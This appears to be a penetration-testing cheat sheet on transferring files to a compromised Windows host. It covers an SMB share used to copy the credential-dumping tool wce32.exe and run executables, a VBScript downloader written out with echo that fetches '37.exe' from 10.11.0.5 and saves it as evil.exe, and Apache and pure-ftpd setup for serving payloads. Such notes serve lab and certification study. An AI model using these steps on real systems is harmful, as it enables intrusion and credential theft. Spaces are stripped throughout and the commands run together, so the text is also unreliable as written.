# mount current directory `.` to smb share name `a`smbserver.pya.# to copy eg. in windowscopy \\192.168.1.100\a\wce32.exe.# execute exe using smb share\\192.168.1.100\a\whoami.exe
#Windows downloader script using VBechostrUrl=WScript.Arguments.Item(0) >wget.vbsechoStrFile=WScript.Arguments.Item(1) >>wget.vbsechoConstHTTPREQUEST_PROXYSETTING_DEFAULT=0>>wget.vbsechoConstHTTPREQUEST_PROXYSETTING_PRECONFIG=0>>wget.vbsechoConstHTTPREQUEST_PROXYSETTING_DIRECT=1>>wget.vbsechoConstHTTPREQUEST_PROXYSETTING_PROXY=2>>wget.vbsechoDimhttp,varByteArray,strData,strBuffer,lngCounter,fs,ts>>wget.vbsechoErr.Clear>>wget.vbsechoSethttp=Nothing>>wget.vbsechoSethttp=CreateObject("WinHttp.WinHttpRequest.5.1") >>wget.vbsechoIfhttpIsNothingThenSethttp=CreateObject("WinHttp.WinHttpRequest") >>wget.vbsechoIfhttpIsNothingThenSethttp=CreateObject("MSXML2.ServerXMLHTTP") >>wget.vbsechoIfhttpIsNothingThenSethttp=CreateObject("Microsoft.XMLHTTP") >>wget.vbsechohttp.Open"GET",strURL,False>>wget.vbsechohttp.Send>>wget.vbsechovarByteArray=http.ResponseBody>>wget.vbsechoSethttp=Nothing>>wget.vbsechoSetfs=CreateObject("Scripting.FileSystemObject") >>wget.vbsechoSetts=fs.CreateTextFile(StrFile,True) >>wget.vbsechostrData="">>wget.vbsechostrBuffer="">>wget.vbsechoForlngCounter=0toUBound(varByteArray) >>wget.vbsechots.WriteChr(255AndAscb(Midb(varByteArray,lngCounter+1,1))) >> wget.vbsechoNext>>wget.vbsechots.Close>>wget.vbs# To Download using scriptcscriptwget.vbshttp://10.11.0.5/37.exeevil.exe
Apache Webserver
# Edit port used 'Listen <Port>'vim/etc/apache2/ports.conf# Create folder to sharemkdir/var/www/html/share#chmodchmod-R755/var/www/html/sharechown-Rwww-data:www-data/var/www/html/share#move file to webserver rootmv/root/Desktop/evil.exe/var/www/html/share#start serviceapache2start
TFTP/PureFTP
#Apache Webserver #(to edit listen port) vim/etc/apache2/ports.confListen8090mkdir/var/www/html/sharechmod-R755/var/www/html/sharechown-Rwww-data:www-data/var/www/html/sharemv/root/Desktop/Test.exe/var/www/html/shareserviceapache2start#PURE FTP#Setting up pure ftpd#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwuseraddoffsec-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome/#changing ftpd password/etc/init.d/pure-ftpdrestartpure-pwpasswdoffsec-f/etc/pure-ftpd/pureftpd.passwdpure-pwmkdb/etc/init.d/pure-ftpdrestart